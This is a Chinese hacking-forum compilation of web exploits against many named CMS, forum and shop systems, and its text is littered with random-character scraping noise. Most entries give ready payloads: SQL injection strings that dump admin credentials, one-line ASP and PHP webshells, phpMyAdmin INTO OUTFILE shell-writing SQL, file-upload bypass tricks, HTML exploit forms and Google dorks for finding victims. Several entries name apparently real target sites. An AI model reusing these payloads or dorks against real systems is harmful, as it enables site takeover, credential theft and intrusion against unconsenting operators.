启航企业建站系统 cookie注入漏洞通杀所有版本
9 L) D5 g/ u7 x4 g; G
3 F8 W! F, |( X/ R' E, Y直接上exploit:9 ^. d9 ^1 F+ b3 k% o
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));0 U T6 D& L- W( |1 ~# [8 U
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
/ o( W7 [ ^1 w) g4 v+ l- @1 g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 c; c/ S/ p) a3 g4 x% i# k, {Asprain论坛 注册用户 上传图片就可拿到webshell" X3 ]8 L3 [* y I$ Y
. @ q. q1 }6 C+ I8 f: \Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。0 ?) x6 s7 \4 j9 W: s+ ^7 Q
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>) ]$ k! }0 b4 |7 R- e$ D( @) {
2.gif 为一小图片文件,一定要小,比如qq表情图片$ Z' O) l5 v3 V9 \' Z
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用( G4 {& d; n9 z: a- @, H
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了# r ?* B" F0 R4 d% I
5.q.asp;.gif, l/ Q) q. a: a! d0 ?
google:Powered by Asprain
7 k: E( d- f' U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& m9 z6 B. e7 O* P! N
2 p5 x& } u9 z* H+ f; wShopNum1全部系统存在上传漏洞。
$ X6 D$ E$ j9 Q* m8 M& J8 S% s* i2 P2 x* d
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。. P8 T7 Z7 R; E' n( G
按说明 提示登录后台。。/ V+ s+ }5 Q B- o: d) I
在后台功能页面->附件管理->附件列表) P% |# G0 a/ C) M5 w9 g
可以直接上传.aspx 后缀木马
- U3 ]8 a0 ^3 Z" ~, {) {2 z1 ?: Dhttp://demo.shopnum1.com/upload/20110720083822500.aspx( N$ p) H X- [3 Y$ ?: A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; B, F( z1 |) Y
# I. E! e- `' J/ ^2 z* C- m5 ]牛牛CMS中小企业网站管理系统 上传漏洞* S: {2 r- M) q1 ] Y7 v
+ |9 y3 U- b- k4 X$ U2 i7 B
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。1 t" h+ m! O9 @
后台:admin/login.asp5 K# Q( u0 n# W; n) S
ewebeditor 5.5 Nday
) N [3 k. T4 w; R6 @* t* uexp:" w$ ?+ {6 O% |- j
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?. \6 w) V; C% v& H8 a( {: \
<input?type=file?name=uploadfile?size=100><br><br>?' y8 K$ s$ M/ {4 M$ l
<input?type=submit?value=upload>?
8 n8 Y6 h; X- R, Y/ A</form>, o1 y0 c% H1 Y( n, f( m( P3 ]
ps:先上传小马.
2 _* t: ~) j# J+ z. E, dinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
+ X8 \& L/ s0 A5 a& }, S {6 D! y6 W! c# S& t8 S5 Z H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 k: J4 b6 t' ^+ q! W% D: z0 H: O
- u2 Q/ D) g0 s% x- b4 s* hYothCMS 遍历目录漏洞0 e! o1 @( D$ x3 T% I" p0 L
" p, i! O* K- _+ @+ z优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
8 M# v. v8 Y6 t o# I# D$ O+ m默认后台:admin/login.asp
! q- v& a. }3 j遍历目录:" s* N7 C/ {8 X% f; _
ewebeditor/manage/upload.asp?id=1&dir=../ {3 ?; g8 P$ M) l5 f" P
data:/ L9 Z7 Q9 m/ t, p9 u8 D2 v3 W
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
1 }: E' a5 a" L/ @; d) v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
v+ [4 F# J1 d. z8 a
8 L( m- X3 }% R# g0 \Net112企业建站系统 1.0
8 o& {0 X0 G% k6 J3 v6 Y$ P( S$ D5 s0 I A% }
源码简介:
6 \' y/ q8 {6 I% A, ANet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。$ c1 o4 c ~4 U5 \3 L4 Y1 q. c! T7 Q
添加管理员:. R/ N" r1 }0 P! t! ~! [& D
http://www.0855.tv/admin/admin.asp?action=add&level=2
% I# W$ A) r$ P; P1 a其实加不加都不是很重要,后台文件都没怎么作验证。8 E( N# y# f3 V0 f
上传路径:& _, z$ s: o _) q, [# K4 u
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
0 b3 L6 w) i% i& _' {, m1 E3 H, Qhttp://www.0855.tv/inc/Upfile.asp?Stype=27 l- d! ^3 f5 k: @. b
怎么利用自己研究。
$ M' r" z: r# R; ?遍历目录:" `- h2 u5 `' [
http://www.0855.tv/admin/upfile.asp?path=../..9 p. S8 e- A+ }* U* _
如:
0 t! e) Z) i9 {( f4 Z, vhttp://www.0855.tv/admin/upfile.asp?path=../admin
$ v3 ~+ s& z2 E' ]http://www.0855.tv/admin/upfile.asp?path=../data
) C7 l: }3 w$ [/ G% ?7 S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 L% Z7 [0 k( _" h7 }( R# L. A- }, a7 S; l4 W
易和阳光购物商城通杀 上传漏洞
2 w2 {& @0 D( g6 B4 `2 z: Y, [
前提要求是IIS6.0+asp坏境。
+ u, p8 ^* }. ]" ]漏洞文件Iheeo_upfile.asp * E& t# d% c% U' i* y" Q) r
过滤不严.直接可以iis6.0上传
7 p, p$ b- u7 P1 P5 Q% ]把ASP木马改成0855.asp;1.gif/ C! i8 [) k& a: i/ u
直接放到明小子上传, ]* ^$ p' k; J0 a
Google搜索:inurl:product.asp?Iheeoid=2 {0 H* P6 F+ q1 R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' N) Q9 r0 T. ?" _9 f |
7 o; x0 y) B4 V( ophpmyadmin后台4种拿shell方法: w/ Q; W" b2 Q0 j# ]
4 U; S! t% F0 Q0 ~1 `
方法一:5 R1 |, i( m/ h, I% f
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );9 d- Z! D; x: k0 z& p3 Y
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
: `. `2 ]+ ^ s- K. d* k* LSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! i' e6 f! u: M----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php; F) }7 T" v& ~
一句话连接密码:xiaoma( S) ` v& Q+ |6 Y) u+ _) X- q2 K
方法二:2 z7 O& |: J: _/ k
Create TABLE xiaoma (xiaoma1 text NOT NULL);
4 x8 {. l: y H& G5 qInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
" C9 R. u1 K4 }8 H3 Tselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
& B D9 a9 g, }+ Q7 Z6 RDrop TABLE IF EXISTS xiaoma;
+ ~: g/ z- s' ? A3 @方法三:9 w2 e9 ?/ a0 R
读取文件内容: select load_file('E:/xamp/www/s.php');
/ o6 r5 o1 w. V# f3 Z) i2 l" w! k& a写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
* o, u/ ~8 B3 h3 `2 g$ N* fcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
6 Y% S) ]" k- y' F2 C) Z5 p方法四:
, Z# K3 ^. R! f" y( {5 L, Bselect load_file('E:/xamp/www/xiaoma.php');
" C. l4 W1 i2 K) [% `select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'& e) ?( W! L; w& r; N9 l0 c; x
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
( x7 i: r C$ Z3 `( \% }5 r( G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; }! T0 g9 w* o2 w
) D; Q/ y6 f# y: V+ G+ M) |
传信网络独立开发网站源码0day漏洞( v* H1 A: j/ D+ K/ ]
5 |! k) @/ c3 E' {0 u后台system/login.asp+ R, e( f$ V& G7 W* W
进了后台有个ewebeditor
$ R+ Z& B( K* ZGoogle 搜索inurl:product1.asp?tyc=
) {7 t' V& o/ N' @' r( R4 I5 c; z+ }编辑器漏洞默认后台ubbcode/admin_login.asp
0 S+ Z8 i( W% w- o! [: h数据库ubbcode/db/ewebeditor.mdb2 w+ c. i& D) F5 h
默认账号密码yzm 111111
5 r! _* i6 p- ]2 k# F' }# d: i& I" L, _9 m
拿webshell方法
' U3 ^6 ^3 m- {: ^8 [+ @/ a- G) n登陆后台点击“样式管理”-选择新增样式
1 G D( E( q5 D" s样式名称:scriptkiddies 随便写
8 i9 z; l/ P) q路径模式:选择绝对路径 / c* a8 G: X$ y! I7 V) w0 V
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
2 F) ]8 M+ ]) h A, A) I% J图片类型比如就是我们要上传的ASP木马格式
' p q" T/ g$ g3 }9 J+ B上传路径:/
. f: K# s" j0 U( A, \" s& I5 S图片限制:写上1000 免的上不了我们的asp木马
( M& j/ i; d. j3 H上传内容不要写
* U$ O* ?/ O8 R$ m! N& t( M# n可以提交了
% Z8 b/ E" ~! B0 y w7 X8 D0 h7 G0 ]样式增加成功!
7 _/ q2 ]& p x1 `/ A返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 - @% [: ?- e8 G. ^
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
0 D! p/ K, c, Y/ _网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
8 j, P) @9 A4 L) H$ @4 N上ASP木马 回车 等到路径: c) f8 b2 N: R" Y
; S' M; ~; D- W1 ~8 \: _
后台:system/login.asp
9 w* } j# p$ @( Y8 I3 s5 z) CExp:4 y: X0 ^5 U3 N: U" e+ ?$ F" t) i
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
% X' f+ h$ s$ W# |测试:
9 O" m: P* T+ ]8 W, ?http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
2 n" E/ t- B% M5 C xhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
# S: j, a, o# g. ~, q0 [1 F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 Q$ S, T8 y9 P7 {( }0 x/ {: c" M
" n* F/ x/ n! n9 l7 h Efoosun 0day 最新注入漏洞
9 Z; g! F3 k1 l8 N% W' v6 W1 d w4 h i
& P6 [1 x# X7 j% U9 k- J$ L! r$ ?漏洞文件:www.xxx.com/user/SetNextOptions.asp
& R) P5 N6 k$ S利用简单的方法:6 U \, a& u# ]9 j' l. w
暴管理员帐号:8 y- J' }- V0 b" ~. Y! B) v
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin9 t+ m* M. ]( s) W# |
暴管理员密码:
- ^1 a. D( q7 A- Ghttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,1 Z0 r" T, D, a Z7 g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ y7 y; m6 M% q& k; ^, j4 p! W9 I* W5 m+ A
网站程序的版权未知!
" A/ B7 Y- C1 x5 `7 H1 Y# M! n! z9 q/ h# `" ?! ~& [
默认网站数据库:3 X& a4 J8 w! z! {+ B9 {2 @. u- g
www.i0day.com/data/nxnews.mdb2 s8 ]* f1 p/ t7 W0 r
ewebeditor 在线编辑器:# e- \2 b W3 F- f
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb _/ G0 s# P( r. n
登录地址:ewebeditor/admin_login.asp/ H8 e3 ^4 O+ F. \. X$ N V
默认密码:admin admin
% ?0 _. H+ o" q4 t, }* J5 L/ [* Z登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data, L" I y5 y* q
1 c: J4 }; \8 U, J' q
Sql注入漏洞:
' p# [& l1 x5 O1 _" T: o9 n9 ^- t* {http://www.i0day.com/detail.asp?id=128 g- e* J0 s' }+ k- d: D- p
exp:
# O9 e0 [/ r7 U% b" b$ munion select 1,admin,password,4,5,6,7,8 from admin
& i2 q& x1 p" ?5 n6 K/ f爆出明文帐号/密码
# o+ F9 B& n* I2 h5 S% C8 x3 g
* k+ z4 \3 G' Z) B上传漏洞:
`4 B9 z3 ` }. J后台+upfile.asp: z# M6 `: z# ^8 Z9 j
如:
% N( e! A5 }' G/ p& h8 l- dhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。, W' _1 e$ r! l- }* Z
shell的地址:网址+后台+成功上传的马
g- H0 O/ k& i3 ]! _google:inurl:news.asp?lanmuName=
" k8 b) Q5 M% e5 C( K& w------------------------------------------------------------------------------------------------------------------------------------------------------------------------, y( ]5 ^, N& ?/ C
2 q, B! x% Q* z- R2 ]( {/ s+ e& c, Adedecms最新0day利用不进后台直接拿WEBSHELL9 X6 t/ j( X; D! y; t5 [3 c
! G% Z$ a5 k7 a: H7 Z3 z. A/ N9 V% V( M拿webshell的方法如下:9 P5 b3 ]0 J6 M$ j3 j
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.' A( |; _- H1 ?
前题条件,必须准备好自己的dede数据库,然后插入数据:
, C& S- k/ [& K2 t9 H+ b' {insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); , D/ R% c+ i5 c
. F5 @( E* d; J' v+ m' ]
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。0 R- |7 y+ Z# _, r& v5 }& K8 n
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
" {6 x9 q B! T8 w$ U$ X<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
$ j9 X. Z) C' P+ r/ m. e<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! S4 V/ {% \* ~, e5 \6 m' {
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
9 W+ u- |2 @. b1 \3 _7 T<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- K# }* R0 I% u4 L' s; ^, g/ y! r<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />2 I) X8 T3 Z+ B e) [3 n
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
, y# a2 e+ p9 v9 v; L<input type="text" value="true" name="nocache" style="width:400">* U7 ?/ T; n- E; }: H
<input type="submit" value="提交" name="QuickSearchBtn"><br />% r9 f1 {5 Y& B$ V1 Q3 Q4 K( \
</form>! l1 T" N' |5 u" Q
<script>
+ O5 f2 u$ x; E) B5 O# l, M3 mfunction addaction()! A/ g# Y; `" ^8 L- Y
{% ^7 T8 G; q& V8 H6 \1 d/ B- Q
document.QuickSearch.action=document.QuickSearch.doaction.value;
( O( i z; B- T, N/ L}
6 K) B$ K- p) X5 @* e' Q; N. b# X</script># _# x" g& d) J r k# x
-----------------------------------------------------------------------------------------------------------------------------------------------
( v" H) P1 n0 R) }0 b# S- k
6 h& @& N8 Z- Bdedecms织梦暴最新严重0day漏洞
1 d) a1 U" j9 ?, Rbug被利用步骤如下:
* b& M6 e' w; a6 M' D2 U% Ahttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
( I6 z& g( l* a: k+ Y把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
5 ~6 h- ^- v2 d* _0 W-------------------------------------------------------------------------------------------------------------------------------------------
# M. l' [6 j+ S7 I# B
) z. ]/ N4 }2 {7 }2 ?5 K, c多多淘宝客程序上传漏洞 / d8 ~4 h) k: t+ p, j% w
漏洞页面:
) o' L7 v6 U! c2 _& X2 Yadmin\upload_pic.php1 S+ s/ v% i% l0 M1 J% z
传送门:; \$ d1 D3 ]2 t& Y/ }, e! Y
http://www.www.com/admin/upload_pic.php?uploadtext=slide1/ _3 v, L2 O! H6 j; \; x
PS:copy张图片马 直接 xxx.php 上传抓包地址!
, b6 `& s- O9 T. l4 g) e------------------------------------------------------------------------------------------------------------------------------------------------------
5 H/ b* V% G s0 u6 W: d+ l- z( Y
- k. a/ Q4 ?1 D无忧公司系统ASP专业版后台上传漏洞
, t2 A& J' ?. \% Z漏洞文件 后台上传
" ^0 V: @5 h& o" S% G3 Vadmin/uploadPic.asp' J: o3 |1 S( ~ h: c/ T9 A2 Y
漏洞利用 这个漏洞好像是雷池的& F+ p7 X( Y" @) H. n9 j+ x1 Q3 F
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1" ]' i+ M, H+ {0 O
等到的webshell路径:
. U" P% m. q5 d$ X! n3 a/UploadFiles/scriptkiddies.asp;_2.gif4 D( z* A% N) f9 h( A# n: y+ Z
---------------------------------------------------------------------------------------------------------------------------------------------------0 G0 g+ B& ~+ ]; A4 X% j: I; F
: g0 K6 C: N& Y; [4 i; w住哪酒店分销联盟系统20100 ]0 h% L' O( t2 m
Search:4 I6 ~3 q) r; b
inurl:index.php?m=hotelinfo
4 o, q5 P s0 d4 f: Xhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin6 Q N% h5 r( c0 B# Y, o7 v; _( a
默认后台:index.php?m=admin/login
% c @9 b! i5 Q, h& A, V. v* L0 c+ Q--------------------------------------------------------------------------------------------------------------------------------------------------
# S1 }% N; g& _2 H- ~2 o7 i! [5 P8 B- Q, _
inurl:info_Print.asp?ArticleID=
! g0 S, S) e4 p0 s, y( h后台 ad_login.asp
) N/ {2 K: k" S8 i爆管理员密码:
: p. K+ ?. J H) y# r1 t- H0 \6 N: F5 lunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
& ^3 D2 o$ V6 C6 ^6 h6 @------------------------------------------------------------------------------------------------------------------------------------------------------------! O, U9 t% m7 x+ o4 {% {3 s
+ B" k1 L2 j: z# D& S
搜索框漏洞!9 J* h- \4 G1 p+ b' ^
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='6 u/ {6 P# m: y' x
--------------------------------------------------------------------------------------------------------------------------------------------------------
' j s- W+ }. C' E+ a7 {! p6 q7 a+ k% f L
关键字:# F, I$ E( L. [: R
inurl:/reg_TemletSel.asp?step=2
- H [8 T2 J% W# L% X- V或者' W6 a; x1 B% A* a* P: @
电子商务自助建站--您理想的助手% m: x! R/ O& N/ e0 b2 H
-------------------------------------------------------------------------------------------------------------------------------------------------% G! Y) w: j. W9 Q4 L% m
: r m \* k* g' \
iGiveTest 2.1.0注入漏洞7 \0 b) G& [( [* g
Version: <= 2.1.0
) _( e& o! [6 O# N# Homepage: http://iGiveTest.com/5 C/ g6 p0 G R& U" _3 d
谷歌关键字: “Powered by iGiveTest”
, c' [0 t7 ^& p) i& @& N* u随便注册一个帐号。然后暴管理员帐号和密码0 |7 S: T+ O+ R* l+ x! ~
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
6 U: Q* u* h& p; O------------------------------------------------------------------------------------------------------------------------------------------------9 N( C- W7 S, Y! N
4 x. K- L9 }# i* m9 O1 A1 I+ CCKXP网上书店注入漏洞3 P: @: r& e+ G, G) A& K
工具加表:shop_admin 加字段:admin% p2 Q* ?: y; w6 u
后台:admin/login.asp
" S' O* E: H3 c& {7 s; i登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=// {: P! J! @4 f1 k
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" c9 B* ~' Q6 i- ^, z' j0 |* F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 H. I2 r" i2 Y4 p
. _7 _! M( `2 w' m- ]段富超个人网站系统留言本写马漏洞0 z( e! p6 L7 @* v/ U+ \
源码下载:http://www.mycodes.net/24/2149.htm& O/ v- j" C7 Y! Q! I& Y
addgbook.asp 提交一句话。8 C& T' d# y8 p+ n7 [) q
连接: http://www.xxxx.tv/date/date3f.asp
/ Z( o# \9 j) `+ ?google:为防批量,特略!
1 W% T2 c+ I/ M0 u! k-------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 ]' V/ K# P7 b' Q3 e% n# l) L
" W1 a5 B- Y# A" j0 k/ j: b智有道专业旅游系统v1.0 注入及列目录漏洞9 A+ T/ w6 ], Q1 [/ A8 x0 |
默认后台路径:/admin/login.asp' s- x+ N) M/ o" b% e2 x
默认管理员:admin
3 C9 G+ g/ a% Y默认密码:1234561 i: F$ E* M0 I- v6 ]# U, u
SQL EXP Tset:
! u& W) w2 E$ s, }http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
1 M- C& [( t& h: f/ b2 c9 X) h------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 I& d% b4 A/ [, ^3 o- x* W+ _
0 V. q# ~! ~. b5 O5 Y7 ~/ xewebeditor(PHP) Ver 3.8 本任意文件上传0day1 b9 h+ y u7 y+ ]* B
EXP:/ B e, c& c x, ?
<title>eWebeditoR3.8 for php任意文件上EXP</title>) R8 w) ~( q5 O
<form action="" method=post enctype="multip2 l2 ^8 z, E1 K1 y
art/form-data">
* L0 F0 G& ]/ n# @+ Y<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> : ^* J3 q3 {# X; t. R/ }' m, ~
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
# s) O* U( ?+ `3 a<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
! f! K) |6 N( m$ F$ {3 N& qfile:<input type=file name="uploadfile"><br> ' v# V, l! i/ a5 w U
<input type=button value=submit onclick=fsubmit()> 8 N. L3 \! d4 \! g7 h
</form><br>
n1 g/ z( |1 _- i. e2 `% K<script> * W; A* L! w, ?1 N
function fsubmit(){
: H4 z/ v3 M# zform = document.forms[0]; 4 Y, [6 B' D+ W
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 4 W* ^$ T+ o9 r; N; J g$ P
alert(form.action); ! e. @2 m* X0 p
form.submit();
7 d5 K( z1 D9 t8 G}
+ _( L% m5 C$ z2 c</script>
: D( d" B0 e! L* F注意修改里面ewebeditor的名称还有路径。. J6 e7 {* X6 F- K8 M
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: k# H5 C9 x' r2 M+ n
Q l% E2 U; Z: d$ O, U提交’时提示ip被记录 防注入系统的利用
+ O8 G$ ~4 T: x( h( T1 |网址:http://www.xxx.com/newslist.asp?id=122′
# X% z8 N, \6 v n6 d% _- h提示“你的操作已被记录!”等信息。
" Y# W" v9 d0 o) }+ @2 B利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。, {1 i* ?3 F7 i5 F" @- I! }" j
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' \; F& B$ b. v0 X( \0 [: o- x# w3 |# u6 u F4 \' Q
西部商务网站管理系统 批量拿shell-0day& R4 t4 J8 w* y
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 3 w% R i5 b% P8 s
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
- ~8 i3 R5 p, z2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
. [& `8 m- p/ H3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
6 x- J& B+ u; p6 C4 T* n---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ]7 M; T6 u% x' u
c U* o- i; d! IJspRun!6.0 论坛管理后台注入漏洞! _4 j& R5 k; k8 g
+ O: Y" k- M6 K! Y/ ]SEBUG-ID:20787 发布时间:2011-04-30 影响版本:/ q# H. G4 ? T0 M
JspRun!6.0 4 x/ s, C+ p9 E, O& d, s
漏洞描述:# ~; M0 g) Q6 k4 X7 `- i4 f; |+ p
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
, M4 P9 [$ t5 V' b1 r4 z在处理后台提交的文件中ForumManageAction.java第1940行* m8 X1 k1 P! {# r% z- L ]
String export = request.getParameter("export");//直接获取,没有安全过滤
9 g! j5 K5 u# Vif(export!=null){. y; n1 ]2 U/ e% B* O" t/ X0 D
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...* c7 J9 e: u9 Y
if(styles==null||styles.size()==0){3 C" H+ z$ ]) ]) k9 D& P
<*参考" y8 Z9 M4 _+ U6 B, q Q8 c$ f
nuanfan@gmail.com
2 Z- r; L6 x3 b* t" I# \" w*> SEBUG安全建议:1 G. {+ K% ~9 }1 J: x* m
www.jsprun.net; J: t1 P4 [% C9 O& G
(1)安全过滤变量export+ @2 z- ?" p+ b% P D6 S2 X9 |
(2)在查询语句中使用占位符9 u% G, F: s& I+ G% B
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 d5 e# l' `3 L0 P" H/ |
/ n% W" n1 @/ a! [
乌邦图企业网站系统 cookies 注入5 d7 k( X6 s$ e. K2 b
" \8 c7 y- X7 w0 t: M! a程序完整登陆后台:/admin/login.asp
, ^! W8 g1 X+ o2 H* I3 p- a# f2 _默认登陆帐号:admin 密码:admin888! N y5 M }# N6 W
语句:(前面加个空格)
; l8 g- ^5 _& e* u+ J& g0 c. {and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
+ _5 |1 J; K$ }或者是16个字段:
0 b/ B- O% S2 T/ ^and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin, b3 R5 F& _) c
爆不出来自己猜字段。+ `( ?, n- X$ B( I. v
注入点:http://www.untnt.com/shownews.asp?=884 ~% v! u) Q, N1 K
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp! }' j% c( q4 v% o" _
关键字:
& Q+ d$ f) E/ C* d4 Pinurl:shownews?asp.id=+ F4 o# Z4 t+ y" i1 ^1 U$ E$ y6 \8 W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. P, h# k6 [( q, K3 C) j N. _! x
9 E; Q* t9 p4 H5 j, M7 ?/ y# \ PCKXP网上书店注入漏洞
$ t |. t) s# V+ i: ?. p+ v( J! `% ]: @1 p+ D+ h! b4 l2 \
工具加表:shop_admin 加字段:admin
' Z0 B1 H1 k. Q; ?后台:admin/login.asp ! k6 w: u; ?' H- Y
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/8 C% c! T3 E: X2 Z) v, ?
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
9 | K" j& V" S% \2 |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& `% K# U) W' g; X+ S. E4 S* m$ q
. L/ U8 x/ _/ yYxShop易想购物商城4.7.1版本任意文件上传漏洞
8 g: J# X- J6 W- y! @% I' F# ]7 |) l2 o- X. j" ~2 {2 X/ v5 C i) K
http://xxoo.com/controls/fckedit ... aspx/connector.aspx: s+ o, {& V0 g
跳转到网站根目录上传任意文件。
4 O0 d" z N( l如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
